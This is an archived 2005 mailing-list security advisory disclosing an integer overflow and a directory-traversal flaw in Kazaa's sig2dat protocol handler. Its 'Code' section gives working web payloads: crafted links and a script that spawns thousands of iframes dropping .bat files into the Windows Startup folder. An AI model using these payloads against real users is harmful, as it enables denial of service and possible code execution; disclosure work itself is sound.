[VulnWatch] Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations
From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/17/05
- Previous message: Rafel Ivgi, The-Insider: "[VulnWatch] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 17 Jan 2005 22:40:47 +0200 To: Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, "securitytracker.com" <bugs@securitytracker.com>, news@securiteam.com, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Kazaa
Vendors: http://www.kazaa.com
Versions: kazaa lite k++(probably all others too...)
Platforms: Windows
Bug: Sig2Dat Protocol Remote Integer Overflow and
Denial Of Service by creating files in arbitrary
locations
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Kazaa is currently the world’s most common P2P file sharing application.
When installing Kazaa a new protocol is installed named “sig2dat”.
This protocol contain an integer overflow vulnerability which may cause
a crash and may allow remote execution of code. There is another
vulnerability in the “File:” parameter which allows creating files in
arbitrary locations and committing Denial Of Service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
The sig2dat protocol syntax:
Sig2dat://<filename>%7c<file length in bytes>< file length in
kilobytes>%7c<HASH>%7c
The vulnerable parameter is the file “Length” (in bytes). Specifying a
numeric value bigger than a 999999999.
Successful exploiting of this vulnerability may allow remote code execution.
There is another vulnerability in the “File:” parameter. It allows creation
of files in arbitrary locations within the same partition as the shared
folder,
using the classic directory transversal technique “../”.
For Example:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/
Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:99999999999999999999
9999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK
HERE</A>
*********************************************************************
2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu
/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m
3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
3) <script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me."
- Previous message: Rafel Ivgi, The-Insider: "[VulnWatch] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
